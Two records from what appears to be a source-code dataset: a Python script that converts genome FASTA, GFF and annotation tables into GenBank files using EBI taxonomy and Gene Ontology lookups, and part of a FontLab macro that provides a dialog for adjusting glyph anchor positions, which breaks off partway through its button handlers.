1a39f0ac1b52e80601d37b28ec8d2bbc57258c03 | 24,381 | py | Python | gff_to_gbk.py | ArnaudBelcour/gbk_from_gff | addf14c55cc5845c68a985c3d9b613bf3153071c | [
"MIT"
] | 3 | 2019-06-08T11:48:11.000Z | 2021-11-29T19:58:48.000Z | gff_to_gbk.py | ArnaudBelcour/gbk_from_gff | addf14c55cc5845c68a985c3d9b613bf3153071c | [
"MIT"
] | null | null | null | gff_to_gbk.py | ArnaudBelcour/gbk_from_gff | addf14c55cc5845c68a985c3d9b613bf3153071c | [
"MIT"
] | 2 | 2020-05-15T12:58:17.000Z | 2020-08-05T06:13:23.000Z | #!/usr/bin/env python3
# coding: utf8
"""
Description:
Using fasta files (scaffold/chromosme/contig file, protein file), gff file, annotation tsv file and the species name
this script writes a genbank file.
The annotation tsv file contains association between gene and annotation (EC number, GO term, Interpro)
to add information to the genbank.
The species name needs to be compatible with the taxonomy of the EBI.
The information needs correct formatting:
gene IDs should be written consistently (like XXX_001, not XXX_1, if you have more than 100 genes).
Currently, when there are multiple GO terms/InterPro/EC entries, the script splits them on ";" or "," (like GO:0006979;GO:0020037;GO:0004601);
if you use another separator, add it to the re.split(',|;').
For the gff file, ensure that each element's start position is at least 1.
If it is 0, gffutils will return an error (source: https://github.com/daler/gffutils/issues/104).
Other information can be added via a dictionary with gene IDs as keys and the information
as values, adapting the condition used for the other annotations (EC, InterPro, GO term).
Usage:
gbk_creator_from_gff.py -fg <Genome fasta file> -fp <Protein Fasta file> -a <Annotation TSV file> -g <GFF file> -s <Species name> -o <GBK Output file name>
"""
import argparse
import datetime
import gffutils
import numpy as np
import os
import pandas as pa
import pronto
import re
import requests
import shutil
from Bio import SeqFeature as sf
from Bio import SeqIO
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
from collections import OrderedDict
try:
from Bio.Alphabet import IUPAC
except ImportError:
IUPAC = None
def merging_mini_gff(gff_folder):
"""
Merge multiple gff files into one.
Return the path to the merged file.
"""
mini_gff_path = os.path.dirname(os.path.realpath(os.listdir(gff_folder)[0])) + "/" + gff_folder + "/"
gff_merged_path = mini_gff_path + 'merged_gff.gff'
with open(gff_merged_path, 'w') as gff_file_merged:
gff_files = os.listdir(gff_folder)
gff_files.remove('merged_gff.gff')
for mini_gff in gff_files:
with open(mini_gff_path + mini_gff, 'rb') as mini_gff_file:
shutil.copyfileobj(mini_gff_file, gff_file_merged)
return gff_merged_path
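# Usage sketch (assuming a relative folder of per-gene gff files):
# merging_mini_gff("gff_parts") concatenates every file in gff_parts/
# into gff_parts/merged_gff.gff and returns that path.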
def create_GO_dataframes():
"""
Use pronto to query the Gene Ontology and to create the Ontology.
Create a dataframe which contains for all GO terms their GO namespaces (molecular_function, ..).
Create a second dataframe containing alternative ID for some GO terms (deprecated ones).
"""
go_ontology = pronto.Ontology('http://purl.obolibrary.org/obo/go/go-basic.obo')
# For each GO terms look to the namespaces associated with them.
go_namespaces = {}
for go_term in go_ontology:
if 'GO:' in go_term:
go_namespaces[go_term] = go_ontology[go_term].namespace
df_go_namespace = pa.DataFrame.from_dict(go_namespaces, orient='index')
df_go_namespace.reset_index(inplace=True)
df_go_namespace.columns = ['GO', 'namespace']
# For each GO terms look if there is an alternative ID fo them.
go_alt_ids = {}
for go_term in go_ontology:
if go_ontology[go_term].alternate_ids != frozenset():
for go_alt in go_ontology[go_term].alternate_ids:
go_alt_ids[go_alt] = go_term
df_go_alternative = pa.DataFrame.from_dict(go_alt_ids, orient='index')
df_go_alternative.reset_index(inplace=True)
df_go_alternative.columns = ['GO', 'alternative_GO']
return df_go_namespace, df_go_alternative
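# Illustrative content (GO:0008150 is the well-known biological_process
# root term): df_go_namespace maps e.g. GO:0008150 -> biological_process;
# df_go_alternative maps each deprecated GO ID to its current replacement.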
def create_taxonomic_data(species_name):
"""
Query the EBI with the species name to create a dictionary containing taxon id,
taxonomy and some other informations.
"""
species_informations = {}
species_name_url = species_name.replace(' ', '%20')
url = 'https://www.ebi.ac.uk/ena/data/taxonomy/v1/taxon/scientific-name/' + species_name_url
response = requests.get(url)
temp_species_informations = response.json()[0]
for temp_species_information in temp_species_informations:
if temp_species_information == 'lineage':
species_informations['taxonomy'] = temp_species_informations[temp_species_information].split('; ')[:-1]
elif temp_species_information == 'division':
species_informations['data_file_division'] = temp_species_informations[temp_species_information]
elif temp_species_information == 'taxId':
species_informations['db_xref'] = 'taxon:' + str(temp_species_informations[temp_species_information])
else:
species_informations[temp_species_information] = temp_species_informations[temp_species_information]
compatible_species_name = species_name.replace('/', '_')
species_informations['description'] = compatible_species_name + ' genome'
species_informations['organism'] = compatible_species_name
species_informations['keywords'] = [compatible_species_name]
return species_informations
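# Illustrative result (taxon 9606 is the NCBI ID for Homo sapiens):
# create_taxonomic_data("Homo sapiens") yields, among other keys,
# {'db_xref': 'taxon:9606', 'description': 'Homo sapiens genome', ...}.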
def find_column_of_interest(df):
'''
Gene column is supposed to be the first one.
Detect columns containing GO number, EC number and Interpro ID.
To do this, regular expression are used, for each types of data.
The occurrence of each regular expression is counted.
Then the column containing the maximum of occurrence for a type of data is associated with it by returning it's name.
'''
columns = df.columns.tolist()
gene_column = columns[0]
go_number_expression = r"[FPC]?:?GO[:_][\d]{7}"
ec_expression = r"[Ee]?[Cc]?:?[\d]{1}[\.]{1}[\d]{,2}[\.]{,1}[\d]{,2}[\.]{,1}[\d]{,3}"
ipr_expression = r"IPR[\d]{6}"
go_number_columns = {}
ec_columns = {}
ipr_columns = {}
for column in columns:
df[column] = df[column].astype(str)
go_number_columns[column] = len(df[df[column].str.match(go_number_expression)])
ec_columns[column] = len(df[df[column].str.match(ec_expression)])
ipr_columns[column] = len(df[df[column].str.match(ipr_expression)])
    # Select the column with the most regex matches for each annotation
    # type, falling back to np.nan when nothing was counted.
    if go_number_columns:
        go_column = max(go_number_columns, key=go_number_columns.get)
    else:
        go_column = np.nan
    if ec_columns:
        ec_column = max(ec_columns, key=ec_columns.get)
    else:
        ec_column = np.nan
    if ipr_columns:
        ipr_column = max(ipr_columns, key=ipr_columns.get)
    else:
        ipr_column = np.nan
return gene_column, go_column, ec_column, ipr_column
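# Illustrative sketch (hypothetical table): for a tsv with columns
# gene / GOs / ECs / IPRs containing values like "GO:0006979", "1.11.1.7"
# and "IPR010255", the regex counts select those columns respectively.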
def contig_info(contig_id, contig_seq, species_informations):
"""
Create contig information from species_informations dictionary and contig id and contig seq.
"""
record = SeqRecord(contig_seq, id=contig_id, name=contig_id,
description=species_informations['description'],
annotations={"molecule_type": "DNA"})
if IUPAC:
record.seq.alphabet = IUPAC.ambiguous_dna
if 'data_file_division' in species_informations:
record.annotations['data_file_division'] = species_informations['data_file_division']
record.annotations['date'] = datetime.date.today().strftime('%d-%b-%Y').upper()
if 'topology' in species_informations:
record.annotations['topology'] = species_informations['topology']
record.annotations['accessions'] = contig_id
if 'organism' in species_informations:
record.annotations['organism'] = species_informations['organism']
# Use of literal_eval for taxonomy and keywords to retrieve list.
if 'taxonomy' in species_informations:
record.annotations['taxonomy'] = species_informations['taxonomy']
if 'keywords' in species_informations:
record.annotations['keywords'] = species_informations['keywords']
if 'source' in species_informations:
record.annotations['source'] = species_informations['source']
new_feature_source = sf.SeqFeature(sf.FeatureLocation(1-1,
len(contig_seq)),
type="source")
new_feature_source.qualifiers['scaffold'] = contig_id
if 'isolate' in species_informations:
new_feature_source.qualifiers['isolate'] = species_informations['isolate']
# db_xref corresponds to the taxon NCBI ID.
# Important if you want to use Pathway Tools after.
if 'db_xref' in species_informations:
new_feature_source.qualifiers['db_xref'] = species_informations['db_xref']
if 'cell_type' in species_informations:
new_feature_source.qualifiers['cell_type'] = species_informations['cell_type']
if 'dev_stage' in species_informations:
new_feature_source.qualifiers['dev_stage'] = species_informations['dev_stage']
if 'mol_type' in species_informations:
new_feature_source.qualifiers['mol_type'] = species_informations['mol_type']
record.features.append(new_feature_source)
return record
def strand_change(input_strand):
"""
The input is strand in str ('-', '+') modify it to be a strand in int (-1, +1) to
be compatible with SeqIO strand reading.
"""
if isinstance(input_strand, str):
if input_strand == '-':
new_strand = -1
elif input_strand == '+':
new_strand = +1
        elif input_strand == '.':
new_strand = None
elif input_strand == '?':
new_strand = 0
elif isinstance(input_strand, int):
if input_strand == -1:
new_strand = input_strand
elif input_strand == +1:
new_strand = input_strand
return new_strand
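# Illustrative mapping: strand_change('+') -> 1, strand_change('-') -> -1,
# strand_change('.') -> None (unstranded), strand_change('?') -> 0 (unknown).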
def search_and_add_RNA(gff_database, gene_informations, record, type_RNA):
"""
Search in the gff_database if the gene have RNA of the (type_RNA).
For the RNA it will add a feature to the contig record of the genbank.
Then it returns the contig record.
gene_informations contain:
[0] -> gene feature
[1] -> gene ID cleaned
[2] -> gene start position
[3] -> gene end postion
[4] -> gene strand modified (str -> int)
"""
for rna in gff_database.children(gene_informations[0], featuretype=type_RNA, order_by='start'):
new_feature_RNA = sf.SeqFeature(sf.FeatureLocation(gene_informations[2],
gene_informations[3],
gene_informations[4]),
type=type_RNA)
new_feature_RNA.qualifiers['locus_tag'] = gene_informations[1]
record.features.append(new_feature_RNA)
return record
def search_and_add_pseudogene(gff_database, gene, record, df_exons, gene_protein_seq):
"""
Search in the gff_database if the gene is a pseudogene.
Add it to the record.
"""
location_exons = []
for pseudogene in gff_database.children(gene, featuretype="pseudogene", order_by='start'):
# Select exon corresponding to the gene.
# Then iterate for each exon and extract information.
df_temp = df_exons[df_exons['gene_id'] == pseudogene.id]
for _, row in df_temp.iterrows():
new_feature_location_exons = sf.FeatureLocation(row['start'],
row['end'],
row['strand'])
location_exons.append(new_feature_location_exons)
if location_exons and len(location_exons)>=2:
exon_compound_locations = sf.CompoundLocation(location_exons, operator='join')
new_feature_cds = sf.SeqFeature(exon_compound_locations, type='CDS')
else:
start_position = gene.start -1
end_position = gene.end
strand = strand_change(gene.strand)
new_feature_cds = sf.SeqFeature(sf.FeatureLocation(start_position,
end_position,
strand),
type="CDS")
new_feature_cds.qualifiers['translation'] = gene_protein_seq[pseudogene.id]
new_feature_cds.qualifiers['locus_tag'] = gene.id
new_feature_cds.qualifiers['pseudo'] = None
record.features.append(new_feature_cds)
return record
def gff_to_gbk(genome_fasta, prot_fasta, annot_table, gff_file, species_name, gbk_out):
"""
From a genome fasta (containing each contigs of the genome),
a protein fasta (containing each protein sequence),
an annotation table (containing gene name associated with GO terms, InterPro and EC),
a gff file (containing gene, exon, mRNA, ncRNA, tRNA),
a contig information table (containing species name, taxon ID, ..)
create a genbank file.
"""
print('Creating GFF database (gffutils)')
# Create the gff database file.
# gffutils use sqlite3 file-based database to access data inside GFF.
# ':memory:' ask gffutils to keep database in memory instead of writting in a file.
gff_database = gffutils.create_db(gff_file, ':memory:', force=True, keep_order=True, merge_strategy='merge', sort_attribute_values=True)
# Length of your gene ID.
# Catch it in the GFF database.
# It's pretty dumb as we go into a loop for one information.
# But I don't find another way to catch the length of gene_id.
length_gene_id = 0
for gene in gff_database.features_of_type('gene'):
length_gene_id = len(gene.id.replace('gene:', ''))
break
# Get the longest contig ID to check if all contig IDs have the
# same length, if not add 0 (at the supposed position of the number).
longest_contig_id = ""
for contig_for_length_id in gff_database.features_of_type('sequence_assembly'):
if len(longest_contig_id) < len(contig_for_length_id.id):
longest_contig_id = contig_for_length_id.id
print('Formatting fasta and annotation file')
# Dictionary with scaffold/chromosome id as key and sequence as value.
contig_seqs = OrderedDict()
for record in SeqIO.parse(genome_fasta, "fasta"):
id_contig = record.id
contig_seqs[id_contig] = record.seq
# Dictionary with gene id as key and protein sequence as value.
gene_protein_seq = {}
for record in SeqIO.parse(prot_fasta, "fasta"):
gene_protein_seq[record.id] = record.seq
# Create a taxonomy dictionary querying the EBI.
species_informations = create_taxonomic_data(species_name)
# Read a tsv file containing GO terms, Interpro and EC associated with gene name.
mapping_data = pa.read_csv(annot_table, sep='\t')
mapping_data.replace(np.nan, '', inplace=True)
gene_column, go_column, ec_column, ipr_column = find_column_of_interest(mapping_data)
mapping_data.set_index(gene_column, inplace=True)
# Dictionary with gene id as key and GO terms/Interpro/EC as value.
annot_GOs = mapping_data[go_column].to_dict()
annot_IPRs = mapping_data[ipr_column].to_dict()
annot_ECs = mapping_data[ec_column].to_dict()
# Query Gene Ontology to extract namespaces and alternative IDs.
df_go_namespace, df_go_alternative = create_GO_dataframes()
# Dictionary GO id as term and GO namespace as value.
df_go_namespace.set_index('GO', inplace=True)
go_namespaces = df_go_namespace['namespace'].to_dict()
# Dictionary GO id as term and GO alternatives id as value.
df_go_alternative.set_index('GO', inplace=True)
go_alternatives = df_go_alternative['alternative_GO'].to_dict()
# Create a dataframe containing each exon with informations (gene, start, end and strand)
df_exons = pa.DataFrame(columns=['exon_id', 'gene_id', 'start', 'end', 'strand'])
print('Searching for exons')
temporary_datas = []
# Search for all exons in gff database and extract start position (have to minus one to get the right position)
# the end position, the strand (have to change from str to int) and the gene ID.
# Then add it to a list of dictionary that will be added to the dataframe.
for exon in gff_database.features_of_type('exon'):
start_position = exon.start - 1
end_position = exon.end
strand = strand_change(exon.strand)
gene_id = exon.id.replace('exon:', '')[:-2]
temporary_datas.append({'exon_id': exon.id, 'gene_id': gene_id,
'start': start_position, 'end':end_position, 'strand': strand})
df_exons = df_exons.append(temporary_datas)
# All SeqRecord objects will be stored in a list and then give to the SeqIO writer to create the genbank.
seq_objects = []
print('Assembling Genbank informations')
# Iterate through each contig.
# Then iterate through gene and throug RNA linked with the gene.
# Then look if protein informations are available.
for contig_id in sorted(contig_seqs):
# Data for each contig.
record = contig_info(contig_id, contig_seqs[contig_id], species_informations)
for gene in gff_database.features_of_type('gene'):
gene_contig = gene.chrom
if gene_contig == contig_id:
id_gene = gene.id
start_position = gene.start -1
end_position = gene.end
strand = strand_change(gene.strand)
new_feature_gene = sf.SeqFeature(sf.FeatureLocation(start_position,
end_position,
strand),
type="gene")
new_feature_gene.qualifiers['locus_tag'] = id_gene
# Add gene information to contig record.
record.features.append(new_feature_gene)
# Search and add RNAs.
gene_informations = [gene, id_gene, start_position, end_position, strand]
record = search_and_add_RNA(gff_database, gene_informations, record, 'mRNA')
record = search_and_add_RNA(gff_database, gene_informations, record,'tRNA')
record = search_and_add_RNA(gff_database, gene_informations, record, 'ncRNA')
record = search_and_add_RNA(gff_database, gene_informations, record, 'lncRNA')
# Search for pseudogene and add them.
record = search_and_add_pseudogene(gff_database, gene, record, df_exons, gene_protein_seq)
# Create CDS using exons, if no exon use gene information
location_exons = []
# Use parent mRNA in gff to find CDS.
# With this we take the isoform of gene.
for mrna in gff_database.children(gene, featuretype="mRNA", order_by='start'):
mrna_id = mrna.id
# Select exon corresponding to the gene.
# Then iterate for each exon and extract information.
df_temp = df_exons[df_exons['gene_id'] == mrna_id]
for _, row in df_temp.iterrows():
new_feature_location_exons = sf.FeatureLocation(row['start'],
row['end'],
row['strand'])
location_exons.append(new_feature_location_exons)
if location_exons and len(location_exons)>=2:
exon_compound_locations = sf.CompoundLocation(location_exons, operator='join')
new_feature_cds = sf.SeqFeature(exon_compound_locations, type='CDS')
else:
new_feature_cds = sf.SeqFeature(sf.FeatureLocation(start_position,
end_position,
strand),
type="CDS")
new_feature_cds.qualifiers['translation'] = gene_protein_seq[mrna_id]
new_feature_cds.qualifiers['locus_tag'] = id_gene
# Add GO annotation according to the namespace.
if mrna_id in annot_GOs:
gene_gos = re.split(';|,', annot_GOs[mrna_id])
if gene_gos != [""]:
go_components = []
go_functions = []
go_process = []
for go in gene_gos:
# Check if GO term is not a deprecated one.
# If yes take the corresponding one in alternative GO.
if go not in go_namespaces:
go_test = go_alternatives[go]
else:
go_test = go
if go_namespaces[go_test] == 'cellular_component':
go_components.append(go)
if go_namespaces[go_test] == 'molecular_function':
go_functions.append(go)
if go_namespaces[go_test] == 'biological_process':
go_process.append(go)
new_feature_cds.qualifiers['go_component'] = go_components
new_feature_cds.qualifiers['go_function'] = go_functions
new_feature_cds.qualifiers['go_process'] = go_process
# Add InterPro annotation.
if mrna_id in annot_IPRs:
gene_iprs = re.split(';|,', annot_IPRs[mrna_id])
if gene_iprs != [""]:
new_feature_cds.qualifiers['db_xref'] = ["InterPro:"+interpro for interpro in gene_iprs]
# Add EC annotation.
if mrna_id in annot_ECs:
gene_ecs = re.split(';|,', annot_ECs[mrna_id])
if gene_ecs != [""]:
new_feature_cds.qualifiers['EC_number'] = [ec.replace('ec:', '') for ec in gene_ecs]
# Add CDS information to contig record
record.features.append(new_feature_cds)
seq_objects.append(record)
# Create Genbank with the list of SeqRecord.
SeqIO.write(seq_objects, gbk_out, 'genbank')
def main(genome_fasta, prot_fasta, annot_table, gff_file_folder, species_name, gbk_out):
# Check if gff is a file or is multiple files in a folder.
# If it's multiple files, it wil merge them in one.
    if os.path.isfile(gff_file_folder):
        gff_file = gff_file_folder
    else:
        gff_file = merging_mini_gff(gff_file_folder)
gff_to_gbk(genome_fasta, prot_fasta, annot_table, gff_file, species_name, gbk_out)
def run():
parser = argparse.ArgumentParser(prog = "gbk_creator_from_gff.py")
parser.add_argument("-fg", "--fgen", dest = "genome_fasta", metavar = "FILE", help = "contig fasta file", required = True)
parser.add_argument("-fp", "--fprot", dest = "prot_fasta", metavar = "FILE", help = "protein fasta file", required = True)
parser.add_argument("-a", "--annot", dest = "annot_table", metavar = "FILE", help = "annotation tsv file", required = True)
parser.add_argument("-g", "--gff", dest = "gff_file_folder", metavar = "FILE or FOLDER", help = "gff file or folder containing multiple gff", required = True)
parser.add_argument("-s", "--speciesname", dest = "species_name", metavar = "STRING", help = "species scientific name", required = True)
parser.add_argument("-o", "--output", dest = "gbk_out", metavar = "FILE", help = "output file", default = "mygbk.gbk")
args = parser.parse_args()
main(genome_fasta=args.genome_fasta, prot_fasta=args.prot_fasta, annot_table=args.annot_table,
gff_file_folder=args.gff_file_folder, species_name=args.species_name, gbk_out=args.gbk_out)
if __name__ == '__main__':
run()
| 46.617591 | 162 | 0.632132 | 3,052 | 24,381 | 4.815858 | 0.149738 | 0.054293 | 0.014152 | 0.015648 | 0.326915 | 0.25432 | 0.201592 | 0.165056 | 0.131923 | 0.116002 | 0 | 0.004492 | 0.27866 | 24,381 | 522 | 163 | 46.706897 | 0.831239 | 0.234486 | 0 | 0.16242 | 0 | 0.006369 | 0.089455 | 0.005985 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035032 | false | 0 | 0.05414 | 0 | 0.11465 | 0.012739 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a3e9d713d8d312ad682cee9b4c6fc31735f9eac | 14,362 | py | Python | Anchors/AdjustAnchors.py | davelab6/fontlab-scripts-1 | 2e59280a2af5dfe708e9ad112b7286f7bf92eb48 | [
"MIT"
] | 33 | 2015-02-25T11:40:08.000Z | 2021-11-12T05:41:09.000Z | Anchors/AdjustAnchors.py | davelab6/fontlab-scripts-1 | 2e59280a2af5dfe708e9ad112b7286f7bf92eb48 | [
"MIT"
] | 1 | 2015-03-07T09:10:20.000Z | 2015-03-08T08:32:57.000Z | Anchors/AdjustAnchors.py | davelab6/fontlab-scripts-1 | 2e59280a2af5dfe708e9ad112b7286f7bf92eb48 | [
"MIT"
] | 15 | 2015-04-03T03:48:36.000Z | 2021-08-30T08:18:26.000Z | #FLM: Adjust Anchors
__copyright__ = __license__ = """
Copyright (c) 2010-2012 Adobe Systems Incorporated. All rights reserved.
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
__doc__ = """
Adjust Anchors v1.2 - Jul 12 2012
This script provides a UI for adjusting the position of anchors interactively.
FontLab's own UI for ajusting anchors is too poor.
Opening FontLab's Preview window and selecting the Anchors pane before running
this script, will allow you to preview the adjustments even better.
==================================================
Versions:
v1.0 - Apr 29 2010 - Initial version.
v1.1 - Jun 15 2012 - UI improvements.
v1.2 - Jul 12 2012 - Fixed issue that affected single master fonts.
"""
listGlyphsSelected = []


def getgselectedglyphs(font, glyph, gindex):
    # Callback for fl.ForSelected: collects the indices of the glyphs
    # currently selected in the Font Window.
    listGlyphsSelected.append(gindex)


fl.ForSelected(getgselectedglyphs)


def getMasterNames(masters, axes):
    global matrix
    masterNames = []
    if masters > 1:
        for m in range(masters):
            mtx = matrix[m]
            masterName = ''
            for i in range(len(axes)):
                masterName += ' ' + axes[i][1] + str(mtx[i])
            masterNames.append(masterName)
    return masterNames


# Axis coordinates of the Multiple Master corners (up to 4 axes, 16 masters).
matrix = [
    (0,0,0,0),(1,0,0,0),(0,1,0,0),(1,1,0,0),(0,0,1,0),(1,0,1,0),(0,1,1,0),(1,1,1,0),
    (0,0,0,1),(1,0,0,1),(0,1,0,1),(1,1,0,1),(0,0,1,1),(1,0,1,1),(0,1,1,1),(1,1,1,1)
]

STYLE_RADIO = STYLE_CHECKBOX + cTO_CENTER
def run(gIndex):
    masters = f[0].layers_number
    axes = f.axis
    masterNames = getMasterNames(masters, axes)
    increment = 0
    if len(axes) == 3:
        increment = 90
    elif len(axes) > 3:
        fl.Message("This macro does not support 4-axis fonts")
        return
    fl.EditGlyph(gIndex)  # opens Glyph Window in case it's not open yet
    glyphBkupDict = {}  # this will store a copy of the edited glyphs and will be used in case 'Cancel' is pressed

    class DialogClass:
        def __init__(self):
            self.d = Dialog(self)
            self.d.size = Point(660, 110 + 48*4 + increment)
            self.d.Center()
            self.d.title = 'Adjust Anchors'
            self.anchorList = []
            self.anchorList_index = 0
            self.anchorList_selected = 0
            self.selectedAnchor = None
            self.glyph = f[gIndex]
            self.gIndex = gIndex
            self.gName = self.glyph.name
            self.gHasAnchors = 0
            self.glyphList = []
            self.glyphList_index = 0
            self.glyphList_selected = 0
            self.selectedglyph = None
            self.k_BIG_SHIFT = 20
            self.k_MEDIUM_SHIFT = 5
            self.k_SMALL_SHIFT = 1
            self.Xshift = 0
            self.Yshift = 0
            self.Xorig = 0
            self.Yorig = 0
            self.Xfinal = 0
            self.Yfinal = 0
            self.RBmasterIndex = 0
            if fl.layer == 0: self.RBmaster0 = 1
            else: self.RBmaster0 = 0
            if fl.layer == 1: self.RBmaster1 = 1
            else: self.RBmaster1 = 0
            if fl.layer == 2: self.RBmaster2 = 1
            else: self.RBmaster2 = 0
            if fl.layer == 3: self.RBmaster3 = 1
            else: self.RBmaster3 = 0
            if fl.layer == 4: self.RBmaster4 = 1
            else: self.RBmaster4 = 0
            if fl.layer == 5: self.RBmaster5 = 1
            else: self.RBmaster5 = 0
            if fl.layer == 6: self.RBmaster6 = 1
            else: self.RBmaster6 = 0
            if fl.layer == 7: self.RBmaster7 = 1
            else: self.RBmaster7 = 0
            # Fill in the Anchor list
            for anchor in self.glyph.anchors:
                self.anchorList.append(anchor.name)
            # Fill in the Glyph list
            for g in f.glyphs:
                if len(g.anchors) > 0:
                    self.glyphList.append(g.name)
            # Check if the initially selected glyph has anchors
            if self.gName in self.glyphList:
                self.gHasAnchors = 1
            posy = 10 + 48*0  # (xTop, yTop, xBot, yBot)
            self.d.AddControl(BUTTONCONTROL, Rect(310, posy, 350, posy+40), 'Yplus5', STYLE_BUTTON, '+'+ str(self.k_MEDIUM_SHIFT))
            posy = 10 + 24*1
            self.d.AddControl(LISTCONTROL, Rect( 10, posy, 150, posy+110), 'glyphList', STYLE_LIST, 'Glyphs')
            self.d.AddControl(LISTCONTROL, Rect(510, posy, 650, posy+110), 'anchorList', STYLE_LIST, 'Anchors')
            posy = 10 + 48*1
            self.d.AddControl(BUTTONCONTROL, Rect(310, posy, 350, posy+40), 'Yplus1', STYLE_BUTTON, '+'+ str(self.k_SMALL_SHIFT))
            posy = 10 + 48*2
            self.d.AddControl(BUTTONCONTROL, Rect(160, posy, 200, posy+40), 'Xminus20', STYLE_BUTTON, '-'+ str(self.k_BIG_SHIFT))
            self.d.AddControl(BUTTONCONTROL, Rect(210, posy, 250, posy+40), 'Xminus5', STYLE_BUTTON, '-'+ str(self.k_MEDIUM_SHIFT))
            self.d.AddControl(BUTTONCONTROL, Rect(260, posy, 300, posy+40), 'Xminus1', STYLE_BUTTON, '-'+ str(self.k_SMALL_SHIFT))
            self.d.AddControl(STATICCONTROL, Rect(310, posy, 323, posy+20), 'stat_label', STYLE_LABEL+cTO_CENTER, 'x:')
            self.d.AddControl(STATICCONTROL, Rect(323, posy, 360, posy+20), 'Xshift', STYLE_LABEL+cTO_CENTER)
            self.d.AddControl(STATICCONTROL, Rect(310, posy+20, 323, posy+40), 'stat_label', STYLE_LABEL+cTO_CENTER, 'y:')
            self.d.AddControl(STATICCONTROL, Rect(323, posy+20, 360, posy+40), 'Yshift', STYLE_LABEL+cTO_CENTER)
            self.d.AddControl(BUTTONCONTROL, Rect(360, posy, 400, posy+40), 'Xplus1', STYLE_BUTTON, '+'+ str(self.k_SMALL_SHIFT))
            self.d.AddControl(BUTTONCONTROL, Rect(410, posy, 450, posy+40), 'Xplus5', STYLE_BUTTON, '+'+ str(self.k_MEDIUM_SHIFT))
            self.d.AddControl(BUTTONCONTROL, Rect(460, posy, 500, posy+40), 'Xplus20', STYLE_BUTTON, '+'+ str(self.k_BIG_SHIFT))
            for i in range(len(masterNames)):
                posy = 154 + 22*i
                self.d.AddControl(CHECKBOXCONTROL, Rect( 25, posy, 200, posy+20), 'RBmaster'+ str(i), STYLE_RADIO, masterNames[i])
            posy = 10 + 48*3
            self.d.AddControl(BUTTONCONTROL, Rect(310, posy, 350, posy+40), 'Yminus1', STYLE_BUTTON, '-'+ str(self.k_SMALL_SHIFT))
            self.d.AddControl(STATICCONTROL, Rect(528, posy, 650, posy+20), 'stat_label', STYLE_LABEL+cTO_CENTER, 'Original position')
            self.d.AddControl(STATICCONTROL, Rect(530, posy+20, 543, posy+40), 'stat_label', STYLE_LABEL+cTO_CENTER, 'x:')
            self.d.AddControl(STATICCONTROL, Rect(543, posy+20, 580, posy+40), 'Xorig', STYLE_LABEL+cTO_CENTER)
            self.d.AddControl(STATICCONTROL, Rect(590, posy+20, 603, posy+40), 'stat_label', STYLE_LABEL+cTO_CENTER, 'y:')
            self.d.AddControl(STATICCONTROL, Rect(603, posy+20, 640, posy+40), 'Yorig', STYLE_LABEL+cTO_CENTER)
            posy = 10 + 48*4
            self.d.AddControl(BUTTONCONTROL, Rect(310, posy, 350, posy+40), 'Yminus5', STYLE_BUTTON, '-'+ str(self.k_MEDIUM_SHIFT))
            self.d.AddControl(STATICCONTROL, Rect(528, posy, 650, posy+20), 'stat_label', STYLE_LABEL+cTO_CENTER, 'Final position')
            self.d.AddControl(STATICCONTROL, Rect(530, posy+20, 543, posy+40), 'stat_label', STYLE_LABEL+cTO_CENTER, 'x:')
            self.d.AddControl(STATICCONTROL, Rect(543, posy+20, 580, posy+40), 'Xfinal', STYLE_LABEL+cTO_CENTER)
            self.d.AddControl(STATICCONTROL, Rect(590, posy+20, 603, posy+40), 'stat_label', STYLE_LABEL+cTO_CENTER, 'y:')
            self.d.AddControl(STATICCONTROL, Rect(603, posy+20, 640, posy+40), 'Yfinal', STYLE_LABEL+cTO_CENTER)

        #====== DIALOG FUNCTIONS =========

        def on_Xminus20(self, code):
            if self.anchorList_selected:
                self.Xshift -= self.k_BIG_SHIFT
                self.d.PutValue('Xshift')
                self.updateXfinal()
                self.update_glyph()

        def on_Xminus5(self, code):
            if self.anchorList_selected:
                self.Xshift -= self.k_MEDIUM_SHIFT
                self.d.PutValue('Xshift')
                self.updateXfinal()
                self.update_glyph()

        def on_Xminus1(self, code):
            if self.anchorList_selected:
                self.Xshift -= self.k_SMALL_SHIFT
                self.d.PutValue('Xshift')
                self.updateXfinal()
                self.update_glyph()

        def on_Xplus1(self, code):
            if self.anchorList_selected:
                self.Xshift += self.k_SMALL_SHIFT
                self.d.PutValue('Xshift')
                self.updateXfinal()
                self.update_glyph()

        def on_Xplus5(self, code):
            if self.anchorList_selected:
                self.Xshift += self.k_MEDIUM_SHIFT
                self.d.PutValue('Xshift')
                self.updateXfinal()
                self.update_glyph()

        def on_Xplus20(self, code):
            if self.anchorList_selected:
                self.Xshift += self.k_BIG_SHIFT
                self.d.PutValue('Xshift')
                self.updateXfinal()
                self.update_glyph()

        def on_Yminus5(self, code):
            if self.anchorList_selected:
                self.Yshift -= self.k_MEDIUM_SHIFT
                self.d.PutValue('Yshift')
                self.updateYfinal()
                self.update_glyph()

        def on_Yminus1(self, code):
            if self.anchorList_selected:
                self.Yshift -= self.k_SMALL_SHIFT
                self.d.PutValue('Yshift')
                self.updateYfinal()
                self.update_glyph()

        def on_Yplus1(self, code):
            if self.anchorList_selected:
                self.Yshift += self.k_SMALL_SHIFT
                self.d.PutValue('Yshift')
                self.updateYfinal()
                self.update_glyph()

